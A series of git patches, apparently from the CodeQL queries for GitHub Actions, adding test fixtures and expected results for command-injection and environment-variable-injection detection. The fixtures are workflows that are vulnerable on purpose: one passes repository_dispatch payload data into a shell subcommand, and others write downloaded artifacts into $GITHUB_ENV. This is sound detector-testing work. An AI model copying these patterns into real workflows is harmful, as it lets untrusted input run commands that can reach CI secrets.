.github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index eaa9fed4c61..e780af4107d 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -20,6 +20,14 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -61,5 +69,13 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml b/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml new file mode 100644 index 00000000000..d87c3cad006 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml @@ -0,0 +1,196 @@ +name: "Run Dagger pipeline" +description: "Runs a given dagger pipeline" +inputs: + subcommand: + description: "Subcommand for airbyte-ci" + required: true + context: + description: "CI context (e.g., pull_request, manual)" + required: true + github_token: + description: "GitHub token" + required: false + dagger_cloud_token: + description: "Dagger Cloud token" + required: false + docker_hub_username: + description: "Dockerhub username" + required: false + docker_hub_password: + description: "Dockerhub password" + required: false + options: + description: "Options for the subcommand" + required: false + production: + description: "Whether to run in production mode" + required: false + default: "True" + report_bucket_name: + description: "Bucket name for CI reports" + required: false + default: "airbyte-ci-reports-multi" + gcp_gsm_credentials: + description: "GCP credentials for GCP Secret Manager" + required: false + default: "" + gcp_integration_tester_credentials: + description: "GCP credentials for integration tests" + required: false + default: "" + git_repo_url: + description: "Git repository URL" + default: https://github.com/airbytehq/airbyte.git + required: false + git_branch: + description: "Git branch to checkout" + required: false + git_revision: + description: "Git revision to checkout" + required: false + slack_webhook_url: + description: "Slack webhook URL" + required: false + metadata_service_gcs_credentials: + description: "GCP credentials for metadata service" + required: false + metadata_service_bucket_name: + description: "Bucket name for metadata service" + required: false + default: "prod-airbyte-cloud-connector-metadata-service" + sentry_dsn: + description: "Sentry DSN" + required: false + spec_cache_bucket_name: + description: "Bucket name for GCS spec cache" + required: false + default: "io-airbyte-cloud-spec-cache" + spec_cache_gcs_credentials: + description: "GCP credentials for GCS spec cache" + required: false + gcs_credentials: + description: "GCP credentials for GCS" + required: false + ci_job_key: + description: "CI job key" + required: false + s3_build_cache_access_key_id: + description: "Gradle S3 Build Cache AWS access key ID" + required: false + s3_build_cache_secret_key: + description: "Gradle S3 Build Cache AWS secret key" + required: false + airbyte_ci_binary_url: + description: "URL to airbyte-ci binary" + required: false + default: https://connectors.airbyte.com/airbyte-ci/releases/ubuntu/latest/airbyte-ci + python_registry_token: + description: "Python registry API token to publish python package" + required: false + is_fork: + description: "Whether the PR is from a fork" + required: false + default: "false" + max_attempts: + description: "Number of attempts at running the airbyte-ci command" + required: false + default: 1 + retry_wait_seconds: + description: "Number of seconds to wait between retry attempts" + required: false + default: 60 + +runs: + using: "composite" + steps: + - name: Get start timestamp + id: get-start-timestamp + shell: bash + run: echo "start-timestamp=$(date +%s)" >> $GITHUB_OUTPUT + - name: Docker login + id: docker-login + uses: docker/login-action@v3 + if: ${{ inputs.docker_hub_username != '' && inputs.docker_hub_password != '' }} + with: + username: ${{ inputs.docker_hub_username }} + password: ${{ inputs.docker_hub_password }} + - name: Install Airbyte CI + id: install-airbyte-ci + uses: ./.github/actions/install-airbyte-ci + with: + airbyte_ci_binary_url: ${{ inputs.airbyte_ci_binary_url }} + is_fork: ${{ inputs.is_fork }} + - name: Run airbyte-ci + id: run-airbyte-ci + uses: nick-fields/retry@v3 + env: + CI: "True" + CI_GIT_USER: ${{ github.repository_owner }} + CI_PIPELINE_START_TIMESTAMP: ${{ steps.get-start-timestamp.outputs.start-timestamp }} + PULL_REQUEST_NUMBER: ${{ github.event.pull_request.number }} + # Next environment variables are workflow inputs based and can be set with empty values if the inputs are not required and passed + CI_CONTEXT: "${{ inputs.context }}" + CI_GIT_BRANCH: ${{ inputs.git_branch || github.head_ref }} + CI_GIT_REPO_URL: ${{ inputs.git_repo_url }} + CI_GIT_REVISION: ${{ inputs.git_revision || github.sha }} + CI_GITHUB_ACCESS_TOKEN: ${{ inputs.github_token }} + CI_JOB_KEY: ${{ inputs.ci_job_key }} + CI_REPORT_BUCKET_NAME: ${{ inputs.report_bucket_name }} + DAGGER_CLOUD_TOKEN: "${{ inputs.dagger_cloud_token }}" + DOCKER_HUB_PASSWORD: ${{ inputs.docker_hub_password }} + DOCKER_HUB_USERNAME: ${{ inputs.docker_hub_username }} + GCP_GSM_CREDENTIALS: ${{ inputs.gcp_gsm_credentials }} + GCP_INTEGRATION_TESTER_CREDENTIALS: ${{ inputs.gcp_integration_tester_credentials }} + GCS_CREDENTIALS: ${{ inputs.gcs_credentials }} + METADATA_SERVICE_BUCKET_NAME: ${{ inputs.metadata_service_bucket_name }} + METADATA_SERVICE_GCS_CREDENTIALS: ${{ inputs.metadata_service_gcs_credentials }} + PRODUCTION: ${{ inputs.production }} + PYTHON_REGISTRY_TOKEN: ${{ inputs.python_registry_token }} + PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }} + S3_BUILD_CACHE_ACCESS_KEY_ID: ${{ inputs.s3_build_cache_access_key_id }} + S3_BUILD_CACHE_SECRET_KEY: ${{ inputs.s3_build_cache_secret_key }} + SENTRY_DSN: ${{ inputs.sentry_dsn }} + SLACK_WEBHOOK: ${{ inputs.slack_webhook_url }} + SPEC_CACHE_BUCKET_NAME: ${{ inputs.spec_cache_bucket_name }} + SPEC_CACHE_GCS_CREDENTIALS: ${{ inputs.spec_cache_gcs_credentials }} + with: + shell: bash + max_attempts: ${{ inputs.max_attempts }} + retry_wait_seconds: ${{ inputs.retry_wait_seconds }} + # 360mn > 6 hours: it's the GitHub runner max job duration + timeout_minutes: 360 + command: | + airbyte-ci --disable-update-check --disable-dagger-run --is-ci --gha-workflow-run-id=${{ github.run_id }} ${{ inputs.subcommand }} ${{ inputs.options }} + - name: Stop Engine + id: stop-engine + if: always() + shell: bash + run: | + mapfile -t containers < <(docker ps --filter name="dagger-engine-*" -q) + if [[ "${#containers[@]}" -gt 0 ]]; then + # give 5mn to the Dagger Engine to push cache data to Dagger Cloud + docker stop -t 300 "${containers[@]}"; + fi + + - name: Collect dagger engine logs + id: collect-dagger-engine-logs + if: always() + uses: jwalton/gh-docker-logs@v2 + with: + dest: "./dagger_engine_logs" + images: "registry.dagger.io/engine" + + - name: Tar logs + id: tar-logs + if: always() + shell: bash + run: tar cvzf ./dagger_engine_logs.tgz ./dagger_engine_logs + + - name: Upload logs to GitHub + id: upload-dagger-engine-logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: ${{ github.job }}_dagger_engine_logs.tgz + path: ./dagger_engine_logs.tgz + retention-days: 7 diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml new file mode 100644 index 00000000000..6a449e24cf0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml @@ -0,0 +1,63 @@ +name: Finalize connector rollout + +on: + repository_dispatch: + types: [finalize-connector-rollout] + workflow_dispatch: + inputs: + connector_name: + description: "Connector name" + required: true + action: + description: "Action to perform" + required: true + options: ["promote", "rollback"] +jobs: + finalize_rollout: + name: Finalize connector rollout + runs-on: connector-publish-large + env: + ACTION: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.action || github.event.client_payload.action }} + steps: + - name: Check action value + run: | + if [[ "${ACTION}" != "promote" && "${ACTION}" != "rollback" ]]; then + echo "Invalid action: ${ACTION}" + exit 1 + fi + shell: bash + - name: Checkout Airbyte + uses: actions/checkout@v4 + - name: Promote {{ github.event.client_payload.connector_name }} release candidate + id: promote-release-candidate + if: ${{ env.ACTION == 'promote' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --promote-release-candidate" + - name: Rollback {{ github.event.client_payload.connector_name }} release candidate + id: rollback-release-candidate + if: ${{ env.ACTION == 'rollback' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + spec_cache_gcs_credentials: ${{ secrets.SPEC_CACHE_SERVICE_ACCOUNT_KEY_PUBLISH }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --rollback-release-candidate" diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index decabad082f..b66822accab 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,6 +1,13 @@ edges +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 99ebb1edc05..393dde04f35 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,5 +1,14 @@ edges +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | From 4edfdb4101ea98948304f253c981e3a4bc4ed8bb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 28 Sep 2024 23:59:23 +0200 Subject: [PATCH 0550/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6f57c4554d0..00d8e21c05d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.58 +version: 0.1.59 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d3b65425c41..94468d4b96c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.58 +version: 0.1.59 groups: [actions, queries] suites: codeql-suites extractor: javascript From c10d5a113e9ce3d0535335512b025bbf368fa604 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Mon, 30 Sep 2024 15:13:32 +0200 Subject: [PATCH 0551/1267] Rename help-file to match .ql file Reported by running ``` codeql generate query-help --format sarifv2.1.0 --output help.sairf ql/src/codeql-suites/actions-code-scanning.qls ``` --- ...stedCheckoutTOCTOUMedium.md => UntrustedCheckoutTOCTOUHigh.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename ql/src/Security/CWE-367/{UntrustedCheckoutTOCTOUMedium.md => UntrustedCheckoutTOCTOUHigh.md} (100%) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md similarity index 100% rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md rename to ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md From e0a2eb93d6ce3ccb2680412a7dc27fcefb2aacdb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 30 Sep 2024 15:27:15 +0200 Subject: [PATCH 0552/1267] fix: Repository checks do not protect workflow_run triggered jobs --- .../codeql/actions/security/ControlChecks.qll | 31 +++++++++-- .../CWE-077/.github/workflows/test11.yml | 55 +------------------ .../CWE-077/EnvVarInjectionCritical.expected | 12 ++-- .../CWE-077/EnvVarInjectionMedium.expected | 11 +--- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../workflows/untrusted_checkout_5.yml | 23 ++++++++ .../workflows/untrusted_checkout_6.yml | 23 ++++++++ .../workflow_run_untrusted_checkout_2.yml | 19 +++++++ .../workflow_run_untrusted_checkout_3.yml | 19 +++++++ .../UntrustedCheckoutCritical.expected | 8 +++ .../CWE-829/UntrustedCheckoutHigh.expected | 2 + 11 files changed, 128 insertions(+), 77 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index b9410f0fcb0..134ce780eee 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -99,9 +99,6 @@ abstract class RepositoryCheck extends ControlCheck { // for pull_requests, that means that it triggers only on local branches or repos from the same org // - they are effective against pull requests/workflow_run since they can control where the code is coming from // - they are not effective against issue_comment since the repository will always be the same - override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() - } } abstract class PermissionCheck extends ControlCheck { @@ -173,9 +170,9 @@ class ActorIfCheck extends ActorCheck instanceof If { } } -class RepositoryIfCheck extends RepositoryCheck instanceof If { - RepositoryIfCheck() { - // eg: github.repository == 'test/foo' +class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { + PullRequestTargetRepositoryIfCheck() { + // eg: github.event.pull_request.head.repo.full_name == github.repository exists( normalizeExpr(this.getCondition()) // github.repository in a workflow_run event triggered by a pull request is the base repository @@ -188,6 +185,28 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { ], _, _) ) } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "pull_request_target" and category = any_relevant_category() + } +} + +class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { + WorkflowRunRepositoryIfCheck() { + // eg: github.event.workflow_run.head_repository.full_name == github.repository + exists( + normalizeExpr(this.getCondition()) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) + ) + } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "workflow_run" and category = any_relevant_category() + } } class AssociationIfCheck extends AssociationCheck instanceof If { diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 2c2480f5353..5edd526d820 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -8,37 +8,11 @@ on: jobs: comment: - if: ${{ github.repository_owner == 'cloudflare' }} + if: ${{ github.repository_owner == 'foo' }} runs-on: ubuntu-latest name: Write comment to the PR steps: - - name: "Put PR and workflow ID on the environment" - uses: actions/github-script@v7 - with: - script: | - // Copied from .github/extract-pr-and-workflow-id.js - const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ - owner: context.repo.owner, - repo: context.repo.repo, - run_id: context.payload.workflow_run.id, - }); - - for (const artifact of allArtifacts.data.artifacts) { - // Extract the PR number from the artifact name - const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); - if (match) { - const packageName = match[1].toUpperCase(); - require("fs").appendFileSync( - process.env.GITHUB_ENV, - `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + - `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` - ); - } - } - - name: "Download runtime versions" - # Regular `actions/download-artifact` doesn't support downloading - # artifacts from another workflow uses: dawidd6/action-download-artifact@v2 with: run_id: ${{ github.event.workflow_run.id }} @@ -52,30 +26,3 @@ jobs: cat runtime-versions.md echo EOF } >> "$GITHUB_ENV" - - - name: "Download pre-release report" - uses: dawidd6/action-download-artifact@v2 - with: - run_id: ${{ github.event.workflow_run.id }} - name: prerelease-report.md - - - name: "Put pre-release report on the environment" - id: prerelease_report - run: | - { - echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" - - - name: "Comment on PR with Wrangler link" - uses: marocchino/sticky-pull-request-comment@v2 - with: - number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} - message: | - ${{ env.PRERELEASE_REPORT }} - - --- - - ${{ env.RUNTIME_VERSIONS }} - diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index cbd17161942..6ad5cf04304 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -20,10 +20,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | @@ -69,10 +66,8 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; 